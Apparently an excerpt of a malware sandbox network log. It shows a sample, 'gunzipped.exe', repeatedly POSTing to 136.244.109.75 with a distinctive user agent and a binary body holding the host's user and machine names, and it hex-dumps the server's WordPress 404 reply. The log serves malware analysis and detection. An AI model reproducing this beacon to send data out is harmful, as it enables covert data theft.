                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:18.792979002 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:18.793018103 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:18.793055058 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:18.793097973 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:18.793138027 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:18.793176889 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:18.793215036 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:18.793256044 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:18.793349028 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.549730136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:19.154294968 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:19.357424974 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:20.300321102 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:19 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:20.300359011 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:20.300395966 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:20.300436974 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:20.300472021 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:20.300508976 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:20.300546885 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:20.300584078 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:20.300622940 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:20.300661087 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          19192.168.2.549731136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:20.757055044 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:20.960659027 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:21.903901100 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:20 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:21.903965950 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:21.904007912 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:21.904048920 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
